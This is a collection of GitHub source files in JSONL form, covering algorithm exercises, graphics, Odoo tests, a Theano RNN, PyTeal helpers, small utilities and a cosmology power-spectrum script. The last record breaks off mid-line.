+{"seq_id":"19072075127","text":"# 완전탐색\nimport collections\ndef solution(answers):\n if answers == []:\n return []\n \n pick = [[1, 2, 3, 4, 5], [2, 1, 2, 3, 2, 4, 2, 5], [3, 3, 1, 1, 2, 2, 4, 4, 5, 5]]\n index = [None, None, None]\n \n answer = collections.defaultdict(int)\n for i in range(len(answers)):\n index[0] = i % 5\n index[1] = i % 8\n index[2] = i % 10\n for j in range(3):\n if answers[i] == pick[j][index[j]]:\n answer[j] += 1\n \n max_score_key, max_score_value = max(answer.items(), key = lambda x: x[1]) \n result = []\n for k, v in answer.items():\n if v == max_score_value:\n result.append(k+1)\n result.sort()\n return result\n","repo_name":"kimdw92/problem_solving","sub_path":"programmers/2_모의고사.py","file_name":"2_모의고사.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7420296952","text":"\"\"\"\nthis sky-box is implemented manually\nit's not perfect but it works\nabdo-taha\n\"\"\"\nclass skyboxcoord:\n l = 100 # length of cube\n\n vertices = [\n [-l,l,l],\n [l,l,l],\n [l,l,-l],\n [-l,l,-l],\n [-l,-l,l],\n [l,-l,l],\n [l,-l,-l],\n [-l,-l,-l]\n ]\n\n prec = 1.0/3\n # needs to move inside about 1.5 pixel to avoid black line\n #still not the best\n delta3 = 1.5/1536\n delta4 = 1.5/2048\n textcoord = [\n [1-delta3, 0.5-delta4],\n [1-delta3, 0.25+delta4],\n [2 * prec-delta3 , 1-delta4],\n [2 * prec-delta3, 0.75+delta4],\n [2 * prec-delta3, 0.5-delta4],\n [2 * prec-delta3, 0.25+delta4],\n [2 * prec-delta3, 0+delta4],\n [1 * prec+delta3, 1-delta4],\n [1 * prec+delta3, 0.75+delta4],\n [1 * prec+delta3, 0.5-delta4],\n [1 * prec+delta3, 0.25+delta4],\n [1 * prec+delta3, 0+delta4],\n [0+delta3, 0.5-delta4],\n [0+delta3, 0.25+delta4]\n ]\n\n faces= [\n [1,6],[2,5],[3,1],[4,2],\n [1,6],[2,5],[6,10],[5,11],\n [5,11],[6,10],[7,13],[8,14],\n [2,5],[6,10],[7,9],[3,4],\n [3,4],[7,9],[8,8],[4,3],\n [1,6],[5,11],[8,12],[4,7]\n ]\n co=[]\n\n def coord(self):\n for pair in self.faces:\n self.co.extend(self.vertices[pair[0]-1])\n self.co.extend(reversed( self.textcoord[pair[1]-1] ))\n return self.co\n","repo_name":"abdo-taha/computerGraphics","sub_path":"maze-runner/skyboxcoord.py","file_name":"skyboxcoord.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"28837210909","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nn = int(input()) \r\ndp = [[0] * 10 for _ in range(n + 1)]\r\n\r\nfor i in range(10):\r\n # 한 자릿 수 일 때 값을 초기화\r\n dp[1][i] = 1\r\n\r\nfor i in range(2, n + 1):\r\n for j in range(10):\r\n for k in range(j, 10):\r\n # i는 자리수 \r\n # j는 마지막 자리수의 수\r\n # k는 j에 따른 새로 올 수 있는 수\r\n dp[i][k] += dp[i - 1][j]\r\n \"\"\" 마지막 숫자가 1이면 1 ~ 9가 올 수 있음 \r\n 바로 전 단계의 마지막수가 같은 것을 더해간다\r\n 최종 결과는 n번째 열의 합\r\n \"\"\"\r\n\r\nprint(sum(dp[n]) % 10007)\r\n","repo_name":"gnlenfn/DailyProblemSolving","sub_path":"백준/Silver/11057. 오르막 수/오르막 수.py","file_name":"오르막 수.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70069395127","text":"import sys, os, urllib\n\n#get the csv file from google finance\ntickerSymbol= raw_input('Enter the ticker symbol: ')\nstartDate = raw_input('Enter the start date(Ex. Jan 20, 2015): ')\nendDate = raw_input('Enter the end date: ')\nstartDate.replace (\" \", \"+\")\nstartDate.replace (\",\", \"2C\")\nendDate.replace (\" \", \"+\")\nendDate.replace (\",\", \"2C\")\n\nurl = \"http://www.google.com/finance/historical?q=\"+str(tickerSymbol)+\"&startdate=\"+str(startDate)+\"&enddate=\"+str(endDate)+\"&output=csv\"\n \n\nurllib.urlretrieve(url, str(tickerSymbol))\nif os.path.isfile(str(tickerSymbol)):\n os.rename(str(tickerSymbol), str(tickerSymbol)+\".csv\")\n print (\"--File Fetched--\")\n sys.exit()\n\nprint (\"--Could not find file--\")\n\n\n#rearrange so latest date is at the bottom of the list\n#stock = str(tickerSymbol)+' '+str(startDate)+' '+str(endDate)\n#open('csv_out.csv', 'w').writelines(open(stock, 'r').readlines()[::-1])\n","repo_name":"usmanzch/StockProject","sub_path":"stockFetch.py","file_name":"stockFetch.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38361284963","text":"# ============================================================================\n# String - Operation\n\ntext = \" Hello World \"\nprint(text)\ntext = \"1234567890abcdfghijklmnopqrstuvwxyz\"\n\nprint(text[2:5]) \n# text = \"1234567890abcdfghijklmnopqrstuvwxyz\"\n# out = 345\n\nprint(text[:5]) \n# text = \"1234567890abcdfghijklmnopqrstuvwxyz\"\n# out = 12345\n\nprint(text[5:]) \n# text = \"1234567890abcdfghijklmnopqrstuvwxyz\"\n# out = 67890abcdfghijklmnopqrstuvwxyz\n\nprint(text[-5:]) \n# text = \"1234567890abcdfghijklmnopqrstuvwxyz\"\n# out = vwxyz\n\nprint(text[:-5]) \n# text = \"1234567890abcdfghijklmnopqrstuvwxyz\"\n# out = 1234567890abcdfghijklmnopqrstu\n\nprint(text[7]) \n# text = \"1234567890abcdfghijklmnopqrstuvwxyz\"\n# out = 8\n\nprint(text[-7]) \n# text = \"1234567890abcdfghijklmnopqrstuvwxyz\"\n# out = t\n\nprint(len(text))\n\n# textFindAndReplace -----\ntext = 'Hello=World=Cup'\ntext = text.replace(\"=\",\", \")\n# out = Hello, World, Cup, \n\n# textToArray -----\n# text awal adalah string, text berikutnya berbentuk list array yang dipisah dari string berdasarkan symbol '='\ntext = 'Hello=World=Cup'\ntext = text.split(\"=\")\n\n\n\n\n# ============================================================================\n# Control - Operation\n\ntext = \"01 Hello\"\nif len(text) > 3:\n\tprint(text)\n\t\n\tif len(text) == 30:\n\t\ttext =\"02 Hello\"\n\telif len(text) <= 30:\n\t\ttext =\"02 World\"\n\telse:\n\t\ttext =\"02 Cup\"\n\t\n\tprint(text)\n\t\n\t\n# ============================================================================\n# List - Array Operation\n\ntextIn = []\ntextIn.append(True)\ntextIn.append(False)\ntextIn.append(False)\ntextIn.append(True)\ntextIn.append(False)\ntextIn.append('Knight')\ntextIn.append('Monster')\ntextIn.remove('Knight')\n\n# arrayToText\nthislist = [\"apple\",\"banana\",\"cherry\"]\nseperator = ',~~~~ ~'\nprint(seperator.join(thislist))\n# out = \"apple,~~~~ ~banana,~~~~ ~cherry\"\n\n# findIndexArray\nthislist = [\"apple\", \"banana\", \"cherry\"]\nprint(thislist.index('cherry'))\n# out = 2\n\n\n\n# ============================================================================\n# For Loop - Operation\n\nfor character in 'hello':\n\tprint(character)\n\t# can use list array instead string\nprint('end of loop')\n\n\t\nfor i in range(5, 8):\n\tprint(i)\nprint('end of loop')\n\nfor j in range(4):\n\tprint(i)\nprint('end of loop')\n\n# ============================================================================\n# While Loop - Operation\ni = 1\nwhile i < 6:\n\tprint(i)\n\tif i == 3:\n\t\tbreak\n\ti += 1\n\t\nprint('end of loop')\n# out = 1 2 3 end of loop . \n\ni = 0\nwhile i < 6:\n\ti += 1\n\tif i == 3:\n\t\tcontinue\n\tprint(i)\n\t\nprint('end of loop')\n# out = 1 2 4 5 6 end of loop . 3 will skip\n\n# ============================================================================\n# Read File - Operation \n# Readlines Method + while loop \nfileIn = 'C:\\\\dataIn\\\\test.txt'\nwith open(fileIn,'r') as fIn:\n\tlines = fIn.readlines()\n\tnoLine = 0\n\t# untuk selanjutnya ketika ingin membaca baris cukup menggunakan lines[x] dimana x adalah baris\n\twhile noLine < len(lines):\n\t\tbarisNow = lines[noLine]\n\t\tnoLine = noLine + 1\n\n# Write \ntextError = \"Hai \\n test\"\nfileLogError = open('C:\\\\dataIn\\\\test.txt', \"a\")\t\nfileLogError.write(textError)\nfileLogError.write(\"\\n\")\nfileLogError.write(textError)\nfileLogError.close()\n\n","repo_name":"udinjelek/py","sub_path":"infoPy.py","file_name":"infoPy.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72056631926","text":"from collections import deque\n\n\ndef get_point(x, y):\n # 주사위가 도착한 칸에 대한 점수를 획득\n visit = [[0] * M for _ in range(N)]\n dq = deque()\n dq.append((x, y))\n val = board[x][y]\n visit[x][y] = 1\n cnt = 1\n while dq:\n cx, cy = dq.popleft()\n for i in range(4):\n nx = cx + dx[i]\n ny = cy + dy[i]\n if nx < 0 or ny < 0 or nx >= N or ny >= M:\n continue\n if board[nx][ny] != val or visit[nx][ny] > 0:\n continue\n dq.append((nx, ny))\n cnt += 1\n visit[nx][ny] = 1\n return cnt * val\n\n\ndef dice_move(x, y):\n # 이동 방향으로 한 칸 굴러가고 없으면 반대로 굴러감\n global dice\n global dir\n nx = x + dx[dir]\n ny = y + dy[dir]\n if nx < 0 or ny < 0 or nx >= N or ny >= M:\n dir = (dir + 2) % 4\n nx = x + dx[dir]\n ny = y + dy[dir]\n temp = []\n if dir == 0:\n temp = [dice[4], dice[1], dice[0], dice[3], dice[5], dice[2]]\n dice = temp[:]\n elif dir == 1:\n temp = [dice[1], dice[5], dice[2], dice[0], dice[4], dice[3]]\n dice = temp[:]\n elif dir == 2:\n temp = [dice[2], dice[1], dice[5], dice[3], dice[0], dice[4]]\n dice = temp[:]\n elif dir == 3:\n temp = [dice[3], dice[0], dice[2], dice[5], dice[4], dice[1]]\n dice = temp[:]\n return nx, ny\n\n\ndx = [0, 1, 0, -1]\ndy = [1, 0, -1, 0]\ndice = [1, 2, 3, 5, 4, 6] # 위, 북, 동, 남, 서, 아래\ndir = 0\npoint = 0\nN, M, K = map(int, input().split())\nboard = [list(map(int, input().split())) for _ in range(N)]\nx, y = 0, 0\nfor _ in range(K):\n x, y = dice_move(x, y)\n point += get_point(x, y)\n if dice[5] > board[x][y]:\n dir = (dir + 1) % 4\n elif dice[5] < board[x][y]:\n dir = (dir - 1) % 4\nprint(point)\n","repo_name":"Algorithm-Study/Algorithm","sub_path":"samsung/B23288_이영섭.py","file_name":"B23288_이영섭.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"32141278732","text":"import logging\n\nfrom odoo.tests import Form, tagged\n\nfrom odoo.addons.l10n_ro_stock_account.tests.common import TestStockCommon\n\n_logger = logging.getLogger(__name__)\n\n\n@tagged(\"post_install\", \"-at_install\")\nclass TestStockSale(TestStockCommon):\n def test_sale_notice_and_invoice(self):\n \"\"\"\n - initial in stoc si contabilitate este valoarea din achizitie\n - dupa vanzare valoarea stocului trebuie sa scada cu valoarea stocului\n vandut\n - valoarea din stoc trebuie sa fie egala cu valoarea din contabilitate\n - in contul de venituri trebuie sa fie inregistrata valoarea de vanzare\n \"\"\"\n\n self.make_purchase()\n\n self.check_stock_valuation(self.val_p1_i, self.val_p2_i)\n self.check_account_valuation(self.val_p1_i, self.val_p2_i)\n\n self.create_so(vals={\"l10n_ro_notice\": True})\n\n # valoarea de stoc dupa vanzarea produselor\n val_stock_p1 = round(self.val_p1_i - self.val_stock_out_so_p1, 2)\n val_stock_p2 = round(self.val_p2_i - self.val_stock_out_so_p2, 2)\n\n self.check_stock_valuation(val_stock_p1, val_stock_p2)\n\n # inca nu se face si descaracarea contabila de gestiune!\n self.check_account_valuation(val_stock_p1, val_stock_p2)\n\n self.create_sale_invoice()\n\n _logger.info(\"Verifcare valoare ramas in stoc\")\n self.check_stock_valuation(val_stock_p1, val_stock_p2)\n self.check_account_valuation(val_stock_p1, val_stock_p2)\n\n _logger.info(\"Verifcare valoare vanduta\")\n self.check_account_valuation(\n -self.val_so_p1, -self.val_so_p2, self.account_income\n )\n\n def test_sale_notice_and_invoice_and_retur(self):\n \"\"\"\n Vanzare si facturare\n - initial in stoc si contabilitate este valoarea din achizitie\n - dupa livrare valoarea stocului trebuie sa scada cu valoarea stocului vandut\n - trebuie sa se inregistreze in contul 418 valoare de vanzare\n - valoarea din stoc trebuie sa fie egala cu valoarea din contabilitate\n - in contul de venituri trebuie sa fie inregistrata valoarea de vanzare\n - dupa facturare soldul contului 418 trebuie sa fie zero\n \"\"\"\n\n # intrare in stoc\n self.make_purchase()\n\n # iesire din stoc prin vanzare\n self.create_so(vals={\"l10n_ro_notice\": True})\n pick = self.so.picking_ids\n\n stock_return_picking_form = Form(\n self.env[\"stock.return.picking\"].with_context(\n active_ids=pick.ids, active_id=pick.ids[0], active_model=\"stock.picking\"\n )\n )\n return_wiz = stock_return_picking_form.save()\n return_wiz.product_return_moves.write(\n {\"quantity\": 2.0, \"to_refund\": True}\n ) # Return only 2\n res = return_wiz.create_returns()\n return_pick = self.env[\"stock.picking\"].browse(res[\"res_id\"])\n\n # Validate picking\n return_pick.move_line_ids.write({\"qty_done\": 2})\n return_pick.l10n_ro_notice = True\n return_pick.button_validate()\n\n self.create_sale_invoice()\n","repo_name":"OCA/l10n-romania","sub_path":"l10n_ro_stock_account_notice/tests/test_sale.py","file_name":"test_sale.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"ro","doc_type":"code","stars":23,"dataset":"github-code","pt":"76"} +{"seq_id":"43839109572","text":"from blocks import initialization\nfrom blocks.bricks import Linear, Rectifier, NDimensionalSoftmax\n#from NDimensionalSoftmax import *\n\nfrom blocks.bricks.parallel import Fork\nfrom blocks.bricks.recurrent import GatedRecurrent, LSTM, SimpleRecurrent\nfrom blocks.bricks.lookup import LookupTable\nimport theano.tensor as T\nimport theano.printing as printing\nimport numpy as np\nimport theano\nimport sys\n\n#this file defines the functions that contain theano statements to build the neural network computation graph\n\n#computes MRR for a given input stream\ndef RR_cost(y, y_hat, y_mask, constant1):\n # does required indexing into y_hat\n i0 = T.repeat(T.arange(y.shape[0]), y.shape[1]).flatten()\n i1 = T.tile(T.arange(y.shape[1]), y.shape[0]).flatten()\n i2 = y.flatten()\n\n # obtain unnormalized probability values for our class label\n y_hat_probs = T.reshape(y_hat[i0,i1,i2], y.shape)\n\n #grab all probabilities greater than classes probability\n s1 = T.ge(y_hat, y_hat_probs[:, :, np.newaxis])\n\n #Calculate Ranks by summing everything greater than class probability\n s4 = s1.sum(axis=-1)\n \n #obtain reciprocal ranks\n rr = constant1/T.cast(s4, theano.config.floatX)\n\n #now compute MRR and count y_mask in calculation\n cost_a=rr* y_mask \n ymasksum = y_mask.sum()\n cost_int = cost_a.sum()\n\n return (cost_int, ymasksum)\n\n#initialize theano bricks\ndef initialize(to_init):\n for bricks in to_init:\n bricks.weights_init = initialization.Uniform(width=0.08)\n bricks.biases_init = initialization.Constant(0)\n bricks.initialize()\n\n#create softmax layer for probabilities\n#this layer takes in masks for the input\ndef softmax_layer(h, y, x_mask, y_mask, lens, vocab_size, hidden_size, boosting):\n hidden_to_output = Linear(name='hidden_to_output', input_dim=hidden_size,\n output_dim=vocab_size)\n initialize([hidden_to_output])\n linear_output = hidden_to_output.apply(h)\n linear_output.name = 'linear_output'\n softmax = NDimensionalSoftmax()\n\n #y_hat = softmax.apply(linear_output, extra_ndim=1)\n #y_hat.name = 'y_hat'\n cost_a = softmax.categorical_cross_entropy(\n y, linear_output, extra_ndim=1)\n #produces correct average\n cost_a=cost_a * y_mask \n\n if boosting:\n #boosting step, must divide by length here\n lensMat = T.tile(lens, (y.shape[0], 1))\n cost_a = cost_a / lensMat\n\n #only count cost of correctly masked entries\n cost = cost_a.sum() / y_mask.sum()\n\n\n cost.name = 'cost'\n\n return (linear_output, cost)\n\n#vanilla rnn layer\ndef rnn_layer(dim, h, n, x_mask, first, **kwargs):\n linear = Linear(input_dim=dim, output_dim=dim, name='linear' + str(n))\n rnn = SimpleRecurrent(dim=dim, activation=Rectifier(), name='rnn' + str(n))\n initialize([linear, rnn])\n applyLin=linear.apply(h)\n if first:\n rnnApply = rnn.apply(applyLin, mask=x_mask, **kwargs)\n else:\n rnnApply = rnn.apply(applyLin, **kwargs)\n\n return rnnApply\n\n#gru layer\ndef gru_layer(dim, h, n, x_mask, first, **kwargs):\n fork = Fork(output_names=['linear' + str(n), 'gates' + str(n)],\n name='fork' + str(n), input_dim=dim, output_dims=[dim, dim * 2])\n gru = GatedRecurrent(dim=dim, name='gru' + str(n))\n initialize([fork, gru])\n linear, gates = fork.apply(h)\n if first:\n gruApply = gru.apply(linear, gates, mask=x_mask, **kwargs)\n else:\n gruApply = gru.apply(linear, gates, **kwargs)\n return gruApply\n\n#lstm layer\ndef lstm_layer(dim, h, n, x_mask, first, **kwargs):\n linear = Linear(input_dim=dim, output_dim=dim * 4, name='linear' + str(n))\n lstm = LSTM(dim=dim, activation=Rectifier(), name='lstm' + str(n))\n initialize([linear, lstm])\n applyLin=linear.apply(h)\n\n if first:\n lstmApply = lstm.apply(applyLin, mask=x_mask, **kwargs)[0]\n else:\n lstmApply = lstm.apply(applyLin, **kwargs)[0]\n return lstmApply\n\n#puts all layers together\ndef nn_fprop(x, x_mask, y, y_mask, lens, vocab_size, hidden_size, num_layers, model, boosting=False, **kwargs):\n lookup = LookupTable(length=vocab_size, dim=hidden_size)\n initialize([lookup])\n h = lookup.apply(x)\n first=True\n for i in range(num_layers):\n if model == 'rnn':\n h = rnn_layer(hidden_size, h, i, x_mask=x_mask, first=first, **kwargs)\n elif model == 'gru':\n h = gru_layer(hidden_size, h, i, x_mask=x_mask, first=first, **kwargs)\n elif model == 'lstm':\n h = lstm_layer(hidden_size, h, i, x_mask=x_mask, first=first, **kwargs)\n else:\n print(\"models must either be rnn or lstm\")\n sys.exit(0)\n first=False\n\n return softmax_layer(h, y, x_mask, y_mask, lens, vocab_size, hidden_size, boosting)\n","repo_name":"moore269/RNNTrajectory","sub_path":"ModelDefinitions/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39353512982","text":"from pyteal import *\n\n@Subroutine(TealType.none)\ndef inner_asset_opt_in(asset_id: TealType.uint64, asset_receiver: TealType.bytes) -> Expr:\n return Seq([\n InnerTxnBuilder.Begin(),\n InnerTxnBuilder.SetFields({\n #TxnField.note: Bytes(\"TUT_ITXN_AT\"),\n TxnField.type_enum: TxnType.AssetTransfer,\n TxnField.asset_amount: Int(0),\n TxnField.xfer_asset: asset_id,\n TxnField.asset_receiver: asset_receiver\n }),\n InnerTxnBuilder.Submit()\n ])\n\n@Subroutine(TealType.none)\ndef inner_asset_transfer_txn(\n asset_id: TealType.uint64,\n asset_amount: TealType.uint64,\n asset_receiver: TealType.bytes,\n close_to: TealType.bytes):\n return Seq([\n InnerTxnBuilder.Begin(),\n InnerTxnBuilder.SetFields({\n TxnField.type_enum: TxnType.AssetTransfer,\n TxnField.xfer_asset: asset_id,\n TxnField.asset_amount: asset_amount,\n TxnField.asset_receiver: asset_receiver,\n TxnField.asset_close_to: close_to\n }),\n InnerTxnBuilder.Submit()\n ])\n\n@Subroutine(TealType.none)\ndef inner_payment_txn(\n amount: TealType.uint64,\n receiver: TealType.bytes,\n close_to: TealType.bytes):\n return Seq([\n InnerTxnBuilder.Begin(),\n InnerTxnBuilder.SetFields({\n TxnField.type_enum: TxnType.Payment,\n TxnField.amount: amount,\n TxnField.receiver: receiver,\n TxnField.close_remainder_to: close_to\n }),\n InnerTxnBuilder.Submit()\n ])\n","repo_name":"platoprotocol/plato.algo.app.sdk","sub_path":"src/contracts/utils/inner_txn_utils.py","file_name":"inner_txn_utils.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73946381365","text":"# -- coding:utf-8 --\n\n\"\"\"\n 设置一个code最多可以玩MAX_COUNT次,每用一次,就把这个COUNT记录到COUNT_FILE_NAME里\n 每次检查,都先读取判断使用次数是否超出MAX_COUNT\n 如果在允许范围内,且code正确,则允许使用引擎\n\n 入口函数: check\n\n 测试说明:把MAX_COUNT设置为2, 运行3遍 python come_in.py 看看效果\n\"\"\"\n\nimport time\nimport base64\nimport os\n\nCOUNT_FILE_NAME = \"count.pyc\"\nMAX_COUNT = 50000\n\n\ndef check(team_name, team_leader_name, code):\n \"\"\"\n 检查team_name和code是否对应, code应该从微信公众号中查询获得\n :param: team_name: 队伍名称\n :param: team_leader_name: 队长名称\n :param: code: 从微信公众号获得的队伍编码\n :return: 如果编码和队伍名称匹配,返回True;否则返回False\n \"\"\"\n count, count_dict = get_count(COUNT_FILE_NAME, code)\n if count > MAX_COUNT:\n return False\n if encode(team_name, team_leader_name) != code:\n return False\n add_count(COUNT_FILE_NAME, code)\n return True\n\n\ndef file_to_dict(input_file_name):\n result_dict = {}\n if not os.path.exists(input_file_name):\n return result_dict\n with open(input_file_name, 'r', encoding='utf-8') as input_file:\n for line in input_file:\n line = line.strip()\n line_parts = line.split(\"\\t\")\n if len(line_parts) < 2:\n continue\n key, value = line_parts[0], int(line_parts[1])\n result_dict[key] = value\n return result_dict\n\n\ndef dict_to_file(input_dict, output_file_name):\n with open(output_file_name, 'w', encoding='utf-8') as output_file:\n for key, value in input_dict.items():\n output_file.write(\"{}\\t{}\".format(key, value))\n\n\ndef get_count(count_file_name, code):\n count_dict = file_to_dict(count_file_name)\n count = count_dict.setdefault(code, 1)\n return count, count_dict\n\n\ndef add_count(count_file_name, code):\n count, count_dict = get_count(count_file_name, code)\n count_dict[code] = count + 1\n dict_to_file(count_dict, count_file_name)\n\n\n# 用team_name和team_leader_name生成一个跟当天时间相关的验证码\ndef encode(team_name, team_leader_name):\n input = team_name + \":\" + time.strftime(\"%Y|%m|%d\", time.localtime()) + \":\" + team_leader_name\n code = base64.b64encode(input.encode('utf-8'))\n code = str(code, 'utf-8')\n return code[:6]\n\n\nif __name__ == \"__main__\":\n print(check('疯狂战队', '张三','uC5oiY'))\n","repo_name":"asfathermou/s3","sub_path":"come_in.py","file_name":"come_in.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16867897131","text":"__author__ = 'red'\nls = ['green', 'red']\ndef color(event):\n fr.configure(bg=ls[0])\n ls[0], ls[1] = ls[1], ls[0]\ndef out(event):\n root.destroy()\n\nfrom Tkinter import *\nroot = Tk()\n\nfr = Frame(root, width=200, height=100)\nbtn = Button(root, text=\"Press\")\n\nfr.pack()\nbtn.pack()\n\nfr.bind(\"\", color)\nbtn.bind(\"\", out)\n\nroot.mainloop()","repo_name":"red82/Graph","sub_path":"Events_1.py","file_name":"Events_1.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19599729248","text":"import sys\ninput=sys.stdin.readline\n\nN=int(input())\nA=list(map(int,input().split()))\noperator=list(map(int,input().split()))\nmin_result=10**8\nmax_result=0\n\ndef result(x,y,operator):\n if operator == 0:\n return x+y\n if operator == 1:\n return x-y\n if operator == 2:\n return x*y\n else:\n if x<0:\n value=(-x)//y\n return -value\n else:\n return x//y\n\ndef dfs(idx,start):\n global min_result\n global max_result\n\n if idx==N-1:\n min_result=min(start,min_result)\n max_result=max(start,max_result)\n return\n \n # 연산자 체크\n for i in range(4):\n # 연산자가 없으면 다음으로\n if operator[i%4]==0:\n continue\n\n operator[i%4]-=1\n dfs(idx+1,result(start,A[idx+1],i%4))\n operator[i%4]+=1\n\ndfs(0,A[0])\n\nprint(max_result)\nprint(min_result)","repo_name":"bn-tw2020/2020_winter_algorithm","sub_path":"participants/SaeHyeon/Algorithms/back_tracking/BOJ14888.py","file_name":"BOJ14888.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"27769679031","text":"import unittest\n\n\"\"\"\nwrite down thoughts\nunder the assumptions explained in the problem statement, we know the expected total is n*(n+1)/2, and we can calculate \nthe total and then the difference is the missing number\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def missingNumber(self, nums: List[int]) -> int:\n n = len(nums) # there is one number missing, but it started from 0, so n=len(nums)\n expected = n * (n + 1) // 2 # 1+2+...+n = n*(n+1)/2\n actual = sum(nums)\n return expected - actual\n\n\nclass TestSolution(unittest.TestCase):\n def test1(self):\n self.assertEqual(2, Solution().missingNumber([3, 0, 1]))\n def test2(self):\n self.assertEqual(2, Solution().missingNumber([0, 1]))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"iseryanxie/leetcode","sub_path":"test_268_missing_num.py","file_name":"test_268_missing_num.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28244254213","text":"import os\r\nimport sys\r\n\r\nimport h5py\r\nimport numpy as np\r\nimport matplotlib\r\nmatplotlib.use(\"Agg\")\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.ndimage import gaussian_filter1d as gf\r\n\r\nfrom compute_power import compute_pk1d, compute_pk3d\r\nfrom tools import tau2deltaF\r\nfrom nbodykit.lab import cosmology\r\n\r\n# colors\r\ncolors = ['b', 'r', 'g', 'c', 'm', 'y', 'k']\r\n\r\ndef plot_skewer(tau, color, ls, label, skewer_id, Lbox=205.):\r\n if len(np.shape(tau)) == 2:\r\n tau = tau.reshape(int(np.sqrt(tau.shape[0])), int(np.sqrt(tau.shape[0])), tau.shape[1])\r\n bins = np.linspace(0., Lbox, tau.shape[2] + 1)\r\n binc = (bins[1:]+bins[:-1])*.5\r\n i = skewer_id\r\n j = i\r\n plt.plot(binc, tau[i, j, :], color=color, ls=ls, label=label)\r\n\r\n# information about simulation\r\nngrid = int(sys.argv[1]) #410 #205 #820\r\nLbox = 205. # cMpc/h\r\nfp_dm = 'fp'\r\nsnapshot = 29 # [2.58, 2.44, 2.32], [28, 29, 30]\r\n#res = sys.argv[2] # \"0.05\" \"0.25\" \"0.5\" \"1.0\"\r\nif ngrid == 820: res = \"0.25\"\r\nelif ngrid == 410: res = \"0.5\"\r\nelif ngrid == 205: res = \"1.0\"\r\nredshift = 2.44\r\npaste = sys.argv[2] #\"CIC\" # \"TSC\"\r\npaste_str = f\"_{paste}\" if paste == \"TSC\" else \"\"\r\n\r\n# Ly alpha skewers directory\r\nsave_dir = \"/n/holylfs05/LABS/hernquist_lab/Everyone/boryanah/LyA/\"\r\n\r\n# load deltaF\r\ndeltaF_file = os.path.join(save_dir, f'noiseless_maps/deltaF{paste_str}_ngrid_{ngrid:d}_snap_{snapshot:d}_{fp_dm}.npy')\r\ndeltaF = np.load(deltaF_file)\r\n\r\n# load tau (real)\r\ntau_file = os.path.join(save_dir, f'noiseless_maps/tau_real{paste_str}_ngrid_{ngrid:d}_snap_{snapshot:d}_{fp_dm}.npy')\r\ntau = np.load(tau_file)\r\nprint(\"mean, std of tau real = \", np.mean(tau), np.std(tau))\r\n\r\n# select one skewer and plot\r\nplt.figure(1, figsize=(11, 10))\r\nsum = 0\r\nplot_skewer(tau, color=colors[sum%len(colors)], ls='--', label='tau no RSD', skewer_id=150)\r\n\r\n# load tau (redshift)\r\ntau_file = os.path.join(save_dir, f'noiseless_maps/tau_redshift{paste_str}_ngrid_{ngrid:d}_snap_{snapshot:d}_{fp_dm}.npy')\r\ntau = np.load(tau_file)\r\nprint(\"mean, std of tau redshift = \", np.mean(tau), np.std(tau))\r\n\r\n# select one skewer and plot\r\nplot_skewer(tau, color=colors[sum%len(colors)], ls='-', label='tau w RSD', skewer_id=150)\r\nsum += 1\r\n\r\n# compute power spectrum\r\nk_hMpc, p1d_hMpc = compute_pk1d(deltaF, Lbox)\r\n\r\n# plot power spectrum\r\nplt.figure(2, figsize=(9, 7))\r\nplt.plot(k_hMpc, p1d_hMpc*k_hMpc/np.pi, label='FGPA')\r\nnp.savez(f\"power1d_fgpa{paste_str}_ngrid{ngrid:d}.npz\", p1d_hMpc=p1d_hMpc, k_hMpc=k_hMpc)\r\n\r\nn_k_bins = 20\r\nn_mu_bins = 16\r\nmu_want = [0., 0.33, 0.66, 1.]\r\n\r\nk_hMpc, mu, p3d_hMpc, counts = compute_pk3d(deltaF, Lbox, n_k_bins, n_mu_bins)\r\nprint(mu)\r\n\r\nno_nans = 0\r\nfor i in range(n_k_bins):\r\n if not np.any(np.isnan(mu[i])): no_nans = i\r\nint_mu = []\r\nfor i in range(len(mu_want)):\r\n int_mu.append(np.argmin(np.abs(mu_want[i] - mu[no_nans])))\r\nprint(k_hMpc[:, int_mu[3]])\r\nnp.savez(f\"power3d_fgpa{paste_str}_ngrid{ngrid:d}.npz\", p3d_hMpc=p3d_hMpc, k_hMpc=k_hMpc, mu=mu, counts=counts)\r\n\r\ncosmo = cosmology.Planck15\r\nP_L = cosmology.LinearPower(cosmo, redshift, transfer='EisensteinHu')\r\n\r\nplt.figure(3, figsize=(9, 7))\r\nplt.plot(k_hMpc[counts[:, int_mu[0]] > 0, int_mu[0]], (p3d_hMpc)[counts[:, int_mu[0]] > 0, int_mu[0]]/P_L.__call__(k_hMpc[counts[:, int_mu[0]] > 0, int_mu[0]]), 